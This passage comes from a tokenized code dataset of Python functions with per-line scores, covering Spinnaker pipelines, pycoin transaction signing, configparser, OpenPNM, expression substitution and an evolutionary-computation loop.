".",
"SpinnakerPipelineLambda",
"(",
"*",
"*",
"kwargs",
")",
"elif",
"pipeline_type",
"==",
"'s3'",
":",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipelineS3",
"(",
"*",
"*",
"kwargs",
")",
"elif",
"pipeline_type",
"==",
"'datapipeline'",
":",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipelineDataPipeline",
"(",
"*",
"*",
"kwargs",
")",
"elif",
"pipeline_type",
"==",
"'manual'",
":",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipelineManual",
"(",
"*",
"*",
"kwargs",
")",
"else",
":",
"# Handles all other pipelines",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipeline",
"(",
"*",
"*",
"kwargs",
")",
"else",
":",
"spinnakerpipeline",
"=",
"pipeline",
".",
"SpinnakerPipelineOnetime",
"(",
"onetime",
"=",
"onetime",
",",
"*",
"*",
"kwargs",
")",
"spinnakerpipeline",
".",
"create_pipeline",
"(",
")"
] | 40.333333 | [
0.025,
0.0425531914893617,
0.04878048780487805,
0,
0.16666666666666666,
0.07142857142857142,
0.045454545454545456,
0.05,
0.08,
0.047619047619047616,
0.3333333333333333,
0,
0.03571428571428571,
0,
0.03773584905660377,
0.030927835051546393,
0,
0.08695652173913043,
0.04878048780487805,
0.02564102564102564,
0.05128205128205128,
0.02702702702702703,
0.04081632653061224,
0.03571428571428571,
0.046511627906976744,
0.02564102564102564,
0.11764705882352941,
0.044444444444444446,
0.027777777777777776,
0.15384615384615385,
0.03260869565217391,
0,
0.046511627906976744
] |
def sign(self, hash160_lookup, tx_in_idx_set=None, hash_type=None, **kwargs):
"""
Sign a standard transaction.
hash160_lookup:
A dictionary (or another object with .get) where keys are hash160 and
values are tuples (secret exponent, public_pair, is_compressed) or None
(in which case the script will obviously not be signed).
"""
checker = self.SolutionChecker(self.tx)
if tx_in_idx_set is None:
tx_in_idx_set = range(len(self.tx.txs_in))
self.tx.check_unspents()
for tx_in_idx in sorted(tx_in_idx_set):
tx_context = checker.tx_context_for_idx(tx_in_idx)
try:
checker.check_solution(tx_context, flags=None)
continue
except ScriptError:
pass
try:
r = self.solve(hash160_lookup, tx_in_idx, hash_type=hash_type, **kwargs)
if isinstance(r, bytes):
self.tx.txs_in[tx_in_idx].script = r
else:
self.tx.txs_in[tx_in_idx].script = r[0]
self.tx.set_witness(tx_in_idx, r[1])
except (SolvingError, ValueError):
pass
return self | [
"def",
"sign",
"(",
"self",
",",
"hash160_lookup",
",",
"tx_in_idx_set",
"=",
"None",
",",
"hash_type",
"=",
"None",
",",
"*",
"*",
"kwargs",
")",
":",
"checker",
"=",
"self",
".",
"SolutionChecker",
"(",
"self",
".",
"tx",
")",
"if",
"tx_in_idx_set",
"is",
"None",
":",
"tx_in_idx_set",
"=",
"range",
"(",
"len",
"(",
"self",
".",
"tx",
".",
"txs_in",
")",
")",
"self",
".",
"tx",
".",
"check_unspents",
"(",
")",
"for",
"tx_in_idx",
"in",
"sorted",
"(",
"tx_in_idx_set",
")",
":",
"tx_context",
"=",
"checker",
".",
"tx_context_for_idx",
"(",
"tx_in_idx",
")",
"try",
":",
"checker",
".",
"check_solution",
"(",
"tx_context",
",",
"flags",
"=",
"None",
")",
"continue",
"except",
"ScriptError",
":",
"pass",
"try",
":",
"r",
"=",
"self",
".",
"solve",
"(",
"hash160_lookup",
",",
"tx_in_idx",
",",
"hash_type",
"=",
"hash_type",
",",
"*",
"*",
"kwargs",
")",
"if",
"isinstance",
"(",
"r",
",",
"bytes",
")",
":",
"self",
".",
"tx",
".",
"txs_in",
"[",
"tx_in_idx",
"]",
".",
"script",
"=",
"r",
"else",
":",
"self",
".",
"tx",
".",
"txs_in",
"[",
"tx_in_idx",
"]",
".",
"script",
"=",
"r",
"[",
"0",
"]",
"self",
".",
"tx",
".",
"set_witness",
"(",
"tx_in_idx",
",",
"r",
"[",
"1",
"]",
")",
"except",
"(",
"SolvingError",
",",
"ValueError",
")",
":",
"pass",
"return",
"self"
] | 42.724138 | [
0.012987012987012988,
0.18181818181818182,
0.05555555555555555,
0.08695652173913043,
0.06172839506172839,
0.04819277108433735,
0.04411764705882353,
0.18181818181818182,
0.0425531914893617,
0.06060606060606061,
0.037037037037037035,
0.0625,
0.0425531914893617,
0.03225806451612903,
0.125,
0.03225806451612903,
0.08333333333333333,
0.06451612903225806,
0.1,
0.125,
0.03409090909090909,
0.05,
0.03571428571428571,
0.09523809523809523,
0.03389830508474576,
0.03571428571428571,
0.043478260869565216,
0.1,
0.10526315789473684
] |
def _analyze(self):
"""Convert a few elementary fields into a molecule object"""
if ("Atomic numbers" in self.fields) and ("Current cartesian coordinates" in self.fields):
self.molecule = Molecule(
self.fields["Atomic numbers"],
np.reshape(self.fields["Current cartesian coordinates"], (-1, 3)),
self.title,
) | [
"def",
"_analyze",
"(",
"self",
")",
":",
"if",
"(",
"\"Atomic numbers\"",
"in",
"self",
".",
"fields",
")",
"and",
"(",
"\"Current cartesian coordinates\"",
"in",
"self",
".",
"fields",
")",
":",
"self",
".",
"molecule",
"=",
"Molecule",
"(",
"self",
".",
"fields",
"[",
"\"Atomic numbers\"",
"]",
",",
"np",
".",
"reshape",
"(",
"self",
".",
"fields",
"[",
"\"Current cartesian coordinates\"",
"]",
",",
"(",
"-",
"1",
",",
"3",
")",
")",
",",
"self",
".",
"title",
",",
")"
] | 48.75 | [
0.05263157894736842,
0.029411764705882353,
0.030612244897959183,
0.08108108108108109,
0.043478260869565216,
0.036585365853658534,
0.07407407407407407,
0.23076923076923078
] |
def _get_input_validator(self, request):
""" Return appropriate input validator.
For POST requests, ``self.post_representation`` is returned
if it is present, ``self.representation`` otherwise.
"""
method = request.method.upper()
if method != 'POST':
return self.representation
elif self.post_representation:
return self.post_representation
else:
return self.representation | [
"def",
"_get_input_validator",
"(",
"self",
",",
"request",
")",
":",
"method",
"=",
"request",
".",
"method",
".",
"upper",
"(",
")",
"if",
"method",
"!=",
"'POST'",
":",
"return",
"self",
".",
"representation",
"elif",
"self",
".",
"post_representation",
":",
"return",
"self",
".",
"post_representation",
"else",
":",
"return",
"self",
".",
"representation"
] | 33 | [
0.025,
0.0425531914893617,
0,
0.04477611940298507,
0.05,
0.18181818181818182,
0,
0.05128205128205128,
0.07142857142857142,
0.05263157894736842,
0.05263157894736842,
0.046511627906976744,
0.15384615384615385,
0.05263157894736842
] |
def use_options(allowed):
"""
Decorator that logs warnings when unpermitted options are passed into its
wrapped function.
Requires that wrapped function has an keyword-only argument named
`options`. If wrapped function has {options} in its docstring, fills in
with the docs for allowed options.
Args:
allowed (list str): list of option keys allowed. If the wrapped
function is called with an option not in allowed, log a warning.
All values in allowed must also be present in `defaults`.
Returns:
Wrapped function with options validation.
>>> @use_options(['title'])
... def test(*, options={}): return options['title']
>>> test(options={'title': 'Hello'})
'Hello'
>>> # test(options={'not_allowed': 123}) # Also logs error message
''
"""
def update_docstring(f):
_update_option_docstring(f, allowed)
@functools.wraps(f)
def check_options(*args, **kwargs):
options = kwargs.get('options', {})
not_allowed = [
option for option in options if option not in allowed
# Don't validate private options
and not option.startswith('_')
]
if not_allowed:
logging.warning(
'The following options are not supported by '
'this function and will likely result in '
'undefined behavior: {}.'.format(not_allowed)
)
return f(*args, **kwargs)
return check_options
return update_docstring | [
"def",
"use_options",
"(",
"allowed",
")",
":",
"def",
"update_docstring",
"(",
"f",
")",
":",
"_update_option_docstring",
"(",
"f",
",",
"allowed",
")",
"@",
"functools",
".",
"wraps",
"(",
"f",
")",
"def",
"check_options",
"(",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
":",
"options",
"=",
"kwargs",
".",
"get",
"(",
"'options'",
",",
"{",
"}",
")",
"not_allowed",
"=",
"[",
"option",
"for",
"option",
"in",
"options",
"if",
"option",
"not",
"in",
"allowed",
"# Don't validate private options",
"and",
"not",
"option",
".",
"startswith",
"(",
"'_'",
")",
"]",
"if",
"not_allowed",
":",
"logging",
".",
"warning",
"(",
"'The following options are not supported by '",
"'this function and will likely result in '",
"'undefined behavior: {}.'",
".",
"format",
"(",
"not_allowed",
")",
")",
"return",
"f",
"(",
"*",
"args",
",",
"*",
"*",
"kwargs",
")",
"return",
"check_options",
"return",
"update_docstring"
] | 31.42 | [
0.04,
0.2857142857142857,
0.025974025974025976,
0.09523809523809523,
0,
0.028985507246376812,
0.04,
0.05263157894736842,
0,
0.2222222222222222,
0.04225352112676056,
0.02631578947368421,
0.043478260869565216,
0,
0.16666666666666666,
0.04081632653061224,
0,
0.12903225806451613,
0.03571428571428571,
0,
0.075,
0.18181818181818182,
0,
0.05714285714285714,
0.3333333333333333,
0.2857142857142857,
0,
0.07142857142857142,
0.045454545454545456,
0,
0.07407407407407407,
0.046511627906976744,
0.0425531914893617,
0.1111111111111111,
0.028985507246376812,
0.041666666666666664,
0.043478260869565216,
0.23076923076923078,
0.07407407407407407,
0.09375,
0.03076923076923077,
0.03225806451612903,
0.03076923076923077,
0.17647058823529413,
0,
0.05405405405405406,
0,
0.07142857142857142,
0,
0.07407407407407407
] |
def items(self, section=_UNSET, raw=False, vars=None):
"""Return a list of (name, value) tuples for each option in a section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
`vars' argument, which must be a dictionary whose contents overrides
any pre-existing defaults.
The section DEFAULT is special.
"""
if section is _UNSET:
return super(RawConfigParser, self).items()
d = self._defaults.copy()
try:
d.update(self._sections[section])
except KeyError:
if section != self.default_section:
raise NoSectionError(section)
# Update with the entry specific variables
if vars:
for key, value in vars.items():
d[self.optionxform(key)] = value
value_getter = lambda option: self._interpolation.before_get(self,
section, option, d[option], d)
if raw:
value_getter = lambda option: d[option]
return [(option, value_getter(option)) for option in d.keys()] | [
"def",
"items",
"(",
"self",
",",
"section",
"=",
"_UNSET",
",",
"raw",
"=",
"False",
",",
"vars",
"=",
"None",
")",
":",
"if",
"section",
"is",
"_UNSET",
":",
"return",
"super",
"(",
"RawConfigParser",
",",
"self",
")",
".",
"items",
"(",
")",
"d",
"=",
"self",
".",
"_defaults",
".",
"copy",
"(",
")",
"try",
":",
"d",
".",
"update",
"(",
"self",
".",
"_sections",
"[",
"section",
"]",
")",
"except",
"KeyError",
":",
"if",
"section",
"!=",
"self",
".",
"default_section",
":",
"raise",
"NoSectionError",
"(",
"section",
")",
"# Update with the entry specific variables",
"if",
"vars",
":",
"for",
"key",
",",
"value",
"in",
"vars",
".",
"items",
"(",
")",
":",
"d",
"[",
"self",
".",
"optionxform",
"(",
"key",
")",
"]",
"=",
"value",
"value_getter",
"=",
"lambda",
"option",
":",
"self",
".",
"_interpolation",
".",
"before_get",
"(",
"self",
",",
"section",
",",
"option",
",",
"d",
"[",
"option",
"]",
",",
"d",
")",
"if",
"raw",
":",
"value_getter",
"=",
"lambda",
"option",
":",
"d",
"[",
"option",
"]",
"return",
"[",
"(",
"option",
",",
"value_getter",
"(",
"option",
")",
")",
"for",
"option",
"in",
"d",
".",
"keys",
"(",
")",
"]"
] | 43.392857 | [
0.018518518518518517,
0.02564102564102564,
0,
0.02631578947368421,
0.02702702702702703,
0.04054054054054054,
0.039473684210526314,
0.058823529411764705,
0,
0.05128205128205128,
0.18181818181818182,
0.06896551724137931,
0.03636363636363636,
0.06060606060606061,
0.16666666666666666,
0.044444444444444446,
0.08333333333333333,
0.0425531914893617,
0.044444444444444446,
0.04,
0.125,
0.046511627906976744,
0.041666666666666664,
0.05405405405405406,
0.07142857142857142,
0.13333333333333333,
0.058823529411764705,
0.02857142857142857
] |
def find_neighbor_throats(self, pores, mode='union', flatten=True):
r"""
Returns a list of throats neighboring the given pore(s)
Parameters
----------
pores : array_like
Indices of pores whose neighbors are sought
flatten : boolean, optional
If ``True`` (default) a 1D array of unique throat indices is
returned. If ``False`` the returned array contains arrays of
neighboring throat indices for each input pore, in the order
they were sent.
mode : string
Specifies logic to filter the resulting list. Options are:
**'or'** : (default) All neighbors of the input pores. This is
also known as the 'union' in set theory or 'any' in boolean logic.
Both keywords are accepted and treated as 'or'.
**'xor'** : Only neighbors of one and only one input pore. This
is useful for finding the thraots that are not shared by any of the
input pores.
**'xnor'** : Neighbors that are shared by two or more input pores.
This is equivalent to finding all neighbors with 'or', minus those
found with 'xor', and is useful for finding neighbors that the
inputs have in common.
**'and'** : Only neighbors shared by all input pores. This is also
known as 'intersection' in set theory and (somtimes) as 'all' in
boolean logic. Both keywords are accepted and treated as 'and'.
Returns
-------
If ``flatten`` is ``True``, returns a 1D array of throat indices
filtered according to the specified mode. If ``flatten`` is ``False``,
returns a list of lists, where each list contains the neighbors of the
corresponding input pores.
Notes
-----
The ``logic`` options are applied to neighboring bonds only, thus it
is not possible to obtain bonds that are part of the global set but
not neighbors. This is because (a) the list of global bonds might be
very large, and (b) it is not possible to return a list of neighbors
for each input site if global sites are considered.
Examples
--------
>>> import openpnm as op
>>> pn = op.network.Cubic(shape=[5, 5, 5])
>>> Ts = pn.find_neighbor_throats(pores=[0, 1])
>>> print(Ts)
[ 0 1 100 101 200 201]
>>> Ts = pn.find_neighbor_throats(pores=[0, 1], flatten=False)
>>> print(Ts)
[array([ 0, 100, 200]), array([ 0, 1, 101, 201])]
"""
pores = self._parse_indices(pores)
if sp.size(pores) == 0:
return sp.array([], ndmin=1, dtype=int)
if 'lil' not in self._im.keys():
self.get_incidence_matrix(fmt='lil')
neighbors = topotools.find_neighbor_bonds(sites=pores, logic=mode,
im=self._im['lil'],
flatten=flatten)
return neighbors | [
"def",
"find_neighbor_throats",
"(",
"self",
",",
"pores",
",",
"mode",
"=",
"'union'",
",",
"flatten",
"=",
"True",
")",
":",
"pores",
"=",
"self",
".",
"_parse_indices",
"(",
"pores",
")",
"if",
"sp",
".",
"size",
"(",
"pores",
")",
"==",
"0",
":",
"return",
"sp",
".",
"array",
"(",
"[",
"]",
",",
"ndmin",
"=",
"1",
",",
"dtype",
"=",
"int",
")",
"if",
"'lil'",
"not",
"in",
"self",
".",
"_im",
".",
"keys",
"(",
")",
":",
"self",
".",
"get_incidence_matrix",
"(",
"fmt",
"=",
"'lil'",
")",
"neighbors",
"=",
"topotools",
".",
"find_neighbor_bonds",
"(",
"sites",
"=",
"pores",
",",
"logic",
"=",
"mode",
",",
"im",
"=",
"self",
".",
"_im",
"[",
"'lil'",
"]",
",",
"flatten",
"=",
"flatten",
")",
"return",
"neighbors"
] | 42.633803 | [
0.014925373134328358,
0.16666666666666666,
0.031746031746031744,
0,
0.1111111111111111,
0.1111111111111111,
0.11538461538461539,
0.03636363636363636,
0,
0.08571428571428572,
0.041666666666666664,
0.041666666666666664,
0.027777777777777776,
0.07407407407407407,
0,
0.14285714285714285,
0.028169014084507043,
0,
0.05333333333333334,
0.02564102564102564,
0.03389830508474576,
0,
0.05263157894736842,
0.02531645569620253,
0.08333333333333333,
0,
0.05128205128205128,
0.02564102564102564,
0.02702702702702703,
0.058823529411764705,
0,
0.05063291139240506,
0.02631578947368421,
0.02631578947368421,
0,
0.13333333333333333,
0.13333333333333333,
0.041666666666666664,
0.0379746835443038,
0.02564102564102564,
0.058823529411764705,
0,
0.15384615384615385,
0.15384615384615385,
0.039473684210526314,
0.02666666666666667,
0.039473684210526314,
0.02631578947368421,
0.03389830508474576,
0,
0.125,
0.125,
0.09375,
0.06,
0.05454545454545454,
0.14285714285714285,
0.09090909090909091,
0.04285714285714286,
0.14285714285714285,
0.06557377049180328,
0,
0.18181818181818182,
0.047619047619047616,
0.06451612903225806,
0.0392156862745098,
0.05,
0.041666666666666664,
0.04054054054054054,
0.057971014492753624,
0.07575757575757576,
0.08333333333333333
] |
def substitute(s, objlist=(), globals={}, locals={}):
"""Substitute global python variables in a command string.
This function parses a string and tries to substitute parts like
`$name` by their value. It is uses by :mod:`image` and :mod:`table`
to handle image and table objects in a command, but also other
variables (integers, strings, etc.) can be substituted.
The following rules apply:
1. A name must start with an underscore or alphabetic, followed
by zero or more alphanumerics and underscores.
2. String parts enclosed in single or double quotes are literals and
are left untouched.
Furthermore a $ can be escaped by a backslash, which is useful
if an environment variable is used. Note that an extra backslash
is required in Python to escape the backslash.
The output contains the quotes and backslashes.
3. A variable is looked up in the given local and global namespaces.
4. If the variable `name` has a vector value, its substitution is
enclosed in square brackets and separated by commas.
5. A string value is enclosed in double quotes. If the value
contains a double quote, that quote is enclosed in single quotes.
6. If the name's value has a type mentioned in the argument `objlist`,
it is substituted by `$n` (where n is a sequence number) and its
value is added to the objects of that type in `objlist`.
7. If the name is unknown or has an unknown type, it is left untouched.
The `objlist` argument is a list of tuples or lists where each tuple
or list has three fields:
1. The first field is the object type (e.g. `table`)
2. The second field is a prefix for the sequence number (usually empty).
E.g. regions could have prefix 'r' resulting in a substitution like
`$r1`.
3. The third field is a list of objects to be substituted. New objects
get appended to it. Usually the list is initially empty.
Apart from substituting variables, it also substitutes `$(expression)`
by the expression result.
It correctly handles parentheses and quotes in the expression.
For example::
>>> a = 2
>>> b = 3
>>> substitute('$(a+b)+$a')
'5+2'
>>> substitute('$(a+b+a)')
'7'
>>> substitute('$((a+b)+$a)')
'$((a+b)+$a)'
>>> substitute('$((a+b)*(a+b))')
'25'
>>> substitute('$(len("ab cd( de"))')
'9'
Substitution is NOT recursive. E.g. if a=1 and b="$a",
the result of substitute("$b") is "$a" and not 1.
"""
# Get the local variables at the caller level if not given.
if not locals:
locals = getlocals(3)
# Initialize some variables.
backslash = False
dollar = False
nparen = 0
name = ''
evalstr = ''
squote = False
dquote = False
out = ''
# Loop through the entire string.
for tmp in s:
if backslash:
out += tmp
backslash = False
continue
# If a dollar is found, we might have a name or expression.
# Alphabetics and underscore are always part of name.
if dollar and nparen == 0:
if tmp == '_' or ('a' <= tmp <= 'z') or ('A' <= tmp <= 'Z'):
name += tmp
continue
# Numerics are only part if not first character.
if '0' <= tmp <= '9' and name != '':
name += tmp
continue
# $( indicates the start of an expression to evaluate.
if tmp == '(' and name == '':
nparen = 1
evalstr = ''
continue
# End of name found. Try to substitute.
out += substitutename(name, objlist, globals, locals)
dollar = False
# Handle possible single or double quotes.
if tmp == '"' and not squote:
dquote = not dquote
elif tmp == "'" and not dquote:
squote = not squote
if not dquote and not squote:
# Count the number of balanced parentheses
# (outside quoted strings) in the subexpression.
if nparen > 0:
if tmp == '(':
nparen += 1
elif tmp == ')':
nparen -= 1
if nparen == 0:
# The last closing parenthese is found.
# Evaluate the subexpression.
# Add the result to the output.
out += substituteexpr(evalstr, globals, locals)
dollar = False
evalstr += tmp
continue
# Set a switch if we have a dollar (outside quoted
# and eval strings).
if tmp == '$':
dollar = True
name = ''
continue
# No special character; add it to output or evalstr.
# Set a switch if we have a backslash.
if nparen == 0:
out += tmp
else:
evalstr += tmp
if tmp == '\\':
backslash = True
# The entire string has been handled.
# Substitute a possible last name.
# Insert a possible incomplete eval string as such.
if dollar:
out += substitutename(name, objlist, globals, locals)
else:
if nparen > 0:
out += '$(' + evalstr
return out | [
"def",
"substitute",
"(",
"s",
",",
"objlist",
"=",
"(",
")",
",",
"globals",
"=",
"{",
"}",
",",
"locals",
"=",
"{",
"}",
")",
":",
"# Get the local variables at the caller level if not given.",
"if",
"not",
"locals",
":",
"locals",
"=",
"getlocals",
"(",
"3",
")",
"# Initialize some variables.",
"backslash",
"=",
"False",
"dollar",
"=",
"False",
"nparen",
"=",
"0",
"name",
"=",
"''",
"evalstr",
"=",
"''",
"squote",
"=",
"False",
"dquote",
"=",
"False",
"out",
"=",
"''",
"# Loop through the entire string.",
"for",
"tmp",
"in",
"s",
":",
"if",
"backslash",
":",
"out",
"+=",
"tmp",
"backslash",
"=",
"False",
"continue",
"# If a dollar is found, we might have a name or expression.",
"# Alphabetics and underscore are always part of name.",
"if",
"dollar",
"and",
"nparen",
"==",
"0",
":",
"if",
"tmp",
"==",
"'_'",
"or",
"(",
"'a'",
"<=",
"tmp",
"<=",
"'z'",
")",
"or",
"(",
"'A'",
"<=",
"tmp",
"<=",
"'Z'",
")",
":",
"name",
"+=",
"tmp",
"continue",
"# Numerics are only part if not first character.",
"if",
"'0'",
"<=",
"tmp",
"<=",
"'9'",
"and",
"name",
"!=",
"''",
":",
"name",
"+=",
"tmp",
"continue",
"# $( indicates the start of an expression to evaluate.",
"if",
"tmp",
"==",
"'('",
"and",
"name",
"==",
"''",
":",
"nparen",
"=",
"1",
"evalstr",
"=",
"''",
"continue",
"# End of name found. Try to substitute.",
"out",
"+=",
"substitutename",
"(",
"name",
",",
"objlist",
",",
"globals",
",",
"locals",
")",
"dollar",
"=",
"False",
"# Handle possible single or double quotes.",
"if",
"tmp",
"==",
"'\"'",
"and",
"not",
"squote",
":",
"dquote",
"=",
"not",
"dquote",
"elif",
"tmp",
"==",
"\"'\"",
"and",
"not",
"dquote",
":",
"squote",
"=",
"not",
"squote",
"if",
"not",
"dquote",
"and",
"not",
"squote",
":",
"# Count the number of balanced parentheses",
"# (outside quoted strings) in the subexpression.",
"if",
"nparen",
">",
"0",
":",
"if",
"tmp",
"==",
"'('",
":",
"nparen",
"+=",
"1",
"elif",
"tmp",
"==",
"')'",
":",
"nparen",
"-=",
"1",
"if",
"nparen",
"==",
"0",
":",
"# The last closing parenthese is found.",
"# Evaluate the subexpression.",
"# Add the result to the output.",
"out",
"+=",
"substituteexpr",
"(",
"evalstr",
",",
"globals",
",",
"locals",
")",
"dollar",
"=",
"False",
"evalstr",
"+=",
"tmp",
"continue",
"# Set a switch if we have a dollar (outside quoted",
"# and eval strings).",
"if",
"tmp",
"==",
"'$'",
":",
"dollar",
"=",
"True",
"name",
"=",
"''",
"continue",
"# No special character; add it to output or evalstr.",
"# Set a switch if we have a backslash.",
"if",
"nparen",
"==",
"0",
":",
"out",
"+=",
"tmp",
"else",
":",
"evalstr",
"+=",
"tmp",
"if",
"tmp",
"==",
"'\\\\'",
":",
"backslash",
"=",
"True",
"# The entire string has been handled.",
"# Substitute a possible last name.",
"# Insert a possible incomplete eval string as such.",
"if",
"dollar",
":",
"out",
"+=",
"substitutename",
"(",
"name",
",",
"objlist",
",",
"globals",
",",
"locals",
")",
"else",
":",
"if",
"nparen",
">",
"0",
":",
"out",
"+=",
"'$('",
"+",
"evalstr",
"return",
"out"
] | 36.772414 | [
0.018867924528301886,
0.03225806451612903,
0,
0.029411764705882353,
0.1267605633802817,
0.030303030303030304,
0.05084745762711865,
0.06666666666666667,
0,
0.029850746268656716,
0.05660377358490566,
0.027777777777777776,
0.11538461538461539,
0.043478260869565216,
0.04225352112676056,
0.05660377358490566,
0.05555555555555555,
0.027777777777777776,
0.043478260869565216,
0.05084745762711865,
0.03125,
0.041666666666666664,
0.04054054054054054,
0.056338028169014086,
0.06349206349206349,
0.02666666666666667,
0,
0.041666666666666664,
0.06896551724137931,
0,
0.07142857142857142,
0.039473684210526314,
0.04054054054054054,
0.3076923076923077,
0.02702702702702703,
0.047619047619047616,
0,
0.04054054054054054,
0.06896551724137931,
0.030303030303030304,
0.17647058823529413,
0,
0.17647058823529413,
0.17647058823529413,
0.08571428571428572,
0.15384615384615385,
0,
0.08823529411764706,
0.18181818181818182,
0,
0.08108108108108109,
0.09523809523809523,
0,
0.075,
0.16666666666666666,
0,
0.06666666666666667,
0.18181818181818182,
0,
0.06896551724137931,
0.03773584905660377,
0,
0.2857142857142857,
0.031746031746031744,
0.1111111111111111,
0.06896551724137931,
0.0625,
0.09523809523809523,
0.1111111111111111,
0.14285714285714285,
0.15384615384615385,
0.125,
0.1111111111111111,
0.1111111111111111,
0.16666666666666666,
0.05405405405405406,
0.11764705882352941,
0.09523809523809523,
0.09090909090909091,
0.06896551724137931,
0.1,
0.029850746268656716,
0.03278688524590164,
0.058823529411764705,
0.027777777777777776,
0.07407407407407407,
0.08333333333333333,
0.03333333333333333,
0.041666666666666664,
0.07407407407407407,
0.08333333333333333,
0.030303030303030304,
0.04878048780487805,
0.07692307692307693,
0.07142857142857142,
0.08333333333333333,
0.0392156862745098,
0.03076923076923077,
0.07692307692307693,
0,
0.04,
0.05405405405405406,
0.06451612903225806,
0.05128205128205128,
0.06451612903225806,
0.05405405405405406,
0.037037037037037035,
0.03333333333333333,
0.07692307692307693,
0.06666666666666667,
0.06451612903225806,
0.0625,
0.06451612903225806,
0.05714285714285714,
0.031746031746031744,
0.03773584905660377,
0.03636363636363636,
0.028169014084507043,
0.05263157894736842,
0.06666666666666667,
0.08333333333333333,
0.03225806451612903,
0.0625,
0.07692307692307693,
0.06896551724137931,
0.08,
0.08333333333333333,
0.03333333333333333,
0.043478260869565216,
0.08695652173913043,
0.09090909090909091,
0.15384615384615385,
0.07692307692307693,
0.08695652173913043,
0.07142857142857142,
0,
0.044444444444444446,
0.047619047619047616,
0.03389830508474576,
0.14285714285714285,
0.03278688524590164,
0.2222222222222222,
0.09090909090909091,
0.06060606060606061,
0.14285714285714285
] |
def evolve(self, generator, evaluator, pop_size=100, seeds=None, maximize=True, bounder=None, **args):
"""Perform the evolution.
This function creates a population and then runs it through a series
of evolutionary epochs until the terminator is satisfied. The general
outline of an epoch is selection, variation, evaluation, replacement,
migration, archival, and observation. The function returns a list of
elements of type ``Individual`` representing the individuals contained
in the final population.
Arguments:
- *generator* -- the function to be used to generate candidate solutions
- *evaluator* -- the function to be used to evaluate candidate solutions
- *pop_size* -- the number of Individuals in the population (default 100)
- *seeds* -- an iterable collection of candidate solutions to include
in the initial population (default None)
- *maximize* -- Boolean value stating use of maximization (default True)
- *bounder* -- a function used to bound candidate solutions (default None)
- *args* -- a dictionary of keyword arguments
The *bounder* parameter, if left as ``None``, will be initialized to a
default ``Bounder`` object that performs no bounding on candidates.
Note that the *_kwargs* class variable will be initialized to the *args*
parameter here. It will also be modified to include the following 'built-in'
keyword argument:
- *_ec* -- the evolutionary computation (this object)
"""
self._kwargs = args
self._kwargs['_ec'] = self
if seeds is None:
seeds = []
if bounder is None:
bounder = Bounder()
self.termination_cause = None
self.generator = generator
self.evaluator = evaluator
self.bounder = bounder
self.maximize = maximize
self.population = []
self.archive = []
# Create the initial population.
if not isinstance(seeds, collections.Sequence):
seeds = [seeds]
initial_cs = copy.copy(seeds)
num_generated = max(pop_size - len(seeds), 0)
i = 0
self.logger.debug('generating initial population')
while i < num_generated:
cs = generator(random=self._random, args=self._kwargs)
initial_cs.append(cs)
i += 1
self.logger.debug('evaluating initial population')
initial_fit = evaluator(candidates=initial_cs, args=self._kwargs)
for cs, fit in zip(initial_cs, initial_fit):
if fit is not None:
ind = Individual(cs, maximize=maximize)
ind.fitness = fit
self.population.append(ind)
else:
self.logger.warning('excluding candidate {0} because fitness received as None'.format(cs))
self.logger.debug('population size is now {0}'.format(len(self.population)))
self.num_evaluations = len(initial_fit)
self.num_generations = 0
self.logger.debug('archiving initial population')
self.archive = self.archiver(random=self._random, population=list(self.population), archive=list(self.archive), args=self._kwargs)
self.logger.debug('archive size is now {0}'.format(len(self.archive)))
self.logger.debug('population size is now {0}'.format(len(self.population)))
# Turn observers and variators into lists if not already
if isinstance(self.observer, collections.Iterable):
observers = self.observer
else:
observers = [self.observer]
if isinstance(self.variator, collections.Iterable):
variators = self.variator
else:
variators = [self.variator]
for obs in observers:
self.logger.debug('observation using {0} at generation {1} and evaluation {2}'.format(obs.__name__, self.num_generations, self.num_evaluations))
obs(population=list(self.population), num_generations=self.num_generations, num_evaluations=self.num_evaluations, args=self._kwargs)
while not self._should_terminate(list(self.population), self.num_generations, self.num_evaluations):
# Select individuals.
self.logger.debug('selection using {0} at generation {1} and evaluation {2}'.format(self.selector.__name__, self.num_generations, self.num_evaluations))
parents = self.selector(random=self._random, population=list(self.population), args=self._kwargs)
self.logger.debug('selected {0} candidates'.format(len(parents)))
offspring_cs = [copy.deepcopy(i.candidate) for i in parents]
for op in variators:
self.logger.debug('variation using {0} at generation {1} and evaluation {2}'.format(op.__name__, self.num_generations, self.num_evaluations))
offspring_cs = op(random=self._random, candidates=offspring_cs, args=self._kwargs)
self.logger.debug('created {0} offspring'.format(len(offspring_cs)))
# Evaluate offspring.
self.logger.debug('evaluation using {0} at generation {1} and evaluation {2}'.format(evaluator.__name__, self.num_generations, self.num_evaluations))
offspring_fit = evaluator(candidates=offspring_cs, args=self._kwargs)
offspring = []
for cs, fit in zip(offspring_cs, offspring_fit):
if fit is not None:
off = Individual(cs, maximize=maximize)
off.fitness = fit
offspring.append(off)
else:
self.logger.warning('excluding candidate {0} because fitness received as None'.format(cs))
self.num_evaluations += len(offspring_fit)
# Replace individuals.
self.logger.debug('replacement using {0} at generation {1} and evaluation {2}'.format(self.replacer.__name__, self.num_generations, self.num_evaluations))
self.population = self.replacer(random=self._random, population=self.population, parents=parents, offspring=offspring, args=self._kwargs)
self.logger.debug('population size is now {0}'.format(len(self.population)))
# Migrate individuals.
self.logger.debug('migration using {0} at generation {1} and evaluation {2}'.format(self.migrator.__name__, self.num_generations, self.num_evaluations))
self.population = self.migrator(random=self._random, population=self.population, args=self._kwargs)
self.logger.debug('population size is now {0}'.format(len(self.population)))
# Archive individuals.
self.logger.debug('archival using {0} at generation {1} and evaluation {2}'.format(self.archiver.__name__, self.num_generations, self.num_evaluations))
self.archive = self.archiver(random=self._random, archive=self.archive, population=list(self.population), args=self._kwargs)
self.logger.debug('archive size is now {0}'.format(len(self.archive)))
self.logger.debug('population size is now {0}'.format(len(self.population)))
self.num_generations += 1
for obs in observers:
self.logger.debug('observation using {0} at generation {1} and evaluation {2}'.format(obs.__name__, self.num_generations, self.num_evaluations))
obs(population=list(self.population), num_generations=self.num_generations, num_evaluations=self.num_evaluations, args=self._kwargs)
return self.population | [
"def",
"evolve",
"(",
"self",
",",
"generator",
",",
"evaluator",
",",
"pop_size",
"=",
"100",
",",
"seeds",
